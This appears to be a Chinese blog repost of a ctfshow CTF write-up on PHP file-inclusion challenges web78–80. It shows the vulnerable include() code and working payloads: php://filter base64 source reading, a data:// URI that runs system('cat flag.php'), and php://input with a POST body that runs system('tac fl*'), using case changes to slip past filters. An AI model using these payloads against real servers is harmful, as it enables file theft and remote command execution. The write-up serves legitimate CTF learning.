ctfshow—文件包含

2022/7/31 6:22:48

本文主要是介绍ctfshow—文件包含,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!

参考

PHP伪协议总结 - SegmentFault 思否

​​​​​​​​​​​​​​WEB78 无防护读取源码

<?php
 
if(isset($_GET['file'])){
    $file = $_GET['file'];
    include($file);
}else{
    highlight_file(__FILE__);
}

伪协议读取后base64解密

payload:?file=php://filter/convert.base64-encode/resource=flag.php

web79 data协议

<?php
if(isset($_GET['file'])){
    $file = $_GET['file'];
    $file = str_replace("php", "???", $file);
    include($file);
}else{
    highlight_file(__FILE__);
}

过滤了php,php到是可以用大写绕过,但是文件名flag.php中的php不能大小写,所以用cat这一类的函数,也可以直接base64绕过php

?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs=
PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs ===> <?php system('cat flag.php');
ils/120361970

查看源代码

web80 input协议

 <?php
if(isset($_GET['file'])){
    $file = $_GET['file'];
    $file = str_replace("php", "???", $file);
    $file = str_replace("data", "???", $file);
    include($file);
}else{
    highlight_file(__FILE__);
} 

php data被过滤

用input协议

继续使用php大小写绕过

GET:
 ?file=phP://input
POST:
<?PHP system('tac fl*');?>

 



这篇关于ctfshow—文件包含的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!


扫一扫关注最新编程教程